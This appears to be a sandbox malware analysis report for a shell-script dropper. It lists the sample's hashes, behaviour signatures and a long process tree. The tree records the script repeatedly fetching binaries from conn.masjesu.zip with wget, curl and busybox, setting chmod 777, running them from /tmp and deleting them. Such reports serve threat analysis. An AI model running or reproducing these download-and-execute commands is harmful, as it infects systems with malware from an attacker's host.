Analysis
-
max time kernel
86s -
max time network
88s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system -
submitted
28/10/2024, 02:32
Static task
static1
Behavioral task
behavioral1
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh
-
Size
10KB
-
MD5
993a3e2f46840103a33a0ca2fc91dfe7
-
SHA1
678e29df40375ee97c70526b0218055aed855419
-
SHA256
53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870
-
SHA512
0bac561038a79d408e79fa667d6a436f7a5dc10e34ab8cf42f4de8e94b30a60aa6239a43161fdbd33a93e41bb712493f51354ae68939b1648fdff8882868c307
-
SSDEEP
192:SrOVDDYRLNeA59BA77wizvDoVNRN8sDiWFvDoVNv8sDiWO9BA77W6GDDYR4Gh:SrOMNv9BA77TzvDoVNR/vDoVNO9BA77x
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh/tmp/53e50a079dd44b3fad308902f263fbdd8f2fbbbc630af95eb9af755dcb641870.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:740
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:754
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:755
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:804
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:808
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:811
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:826
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG./59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm 59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:886
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:914
-
-
/bin/chmodchmod 777 sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt1./sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm sLM3lF5qBp1MBsDsB7eeI4hgepgvJ2snt12⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:921
-
-
/bin/chmodchmod 777 s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT./s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm s0s832PoqRyXmJVHTT1SiGUY1Fh9kImBWT2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:928
-
-
/bin/chmodchmod 777 e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ0./e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm e8K8RoA2ws5xoQXlRo99769Ks4gfT09qQ02⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG./ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm ZYTUjiIOs1IDrzEwZK0AurLPsZFBlNU0iG2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb./V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm V1dIoo9BdZNcAS3tVRcLhZBZZ6Zo80ejYb2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP./BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:951
-
-
/bin/rmrm BS0PYE6MP5BMUNKtVzS1PZ9YBMKEtGMdIP2⤵
- System Network Configuration Discovery
PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs./W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm W1OaQ6s6pG9M9YG949bkaZKY2eJ6VRUtNs2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/RcvRs88N1rRUqekMtkekFouDiCTGre7UAB./RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm RcvRs88N1rRUqekMtkekFouDiCTGre7UAB2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe./TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm TTJUTjc5fC0gDAWsP3yfmFTHeG5HQ5Xbwe2⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS./1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm 1zZtuOaLXZCa1bED4gBqXV0WUOCb6R7TdS2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa./sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm sMDwSLvBqqgXtFWNXxGeFjIWVjdg50gFsa2⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:991
-
-
/bin/chmodchmod 777 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/097EdcnnUqnqqmugSy1vx485KV6h8MN6qb./097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm 097EdcnnUqnqqmugSy1vx485KV6h8MN6qb2⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl7./tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm tLFtQuf8Ud3HcHq77mhzoXXXJFiyc1Htl72⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59npLpiyuM8mc3BSYEXUaoUHyxeUFjoTTG2⤵
- System Network Configuration Discovery
PID:1002
-
-
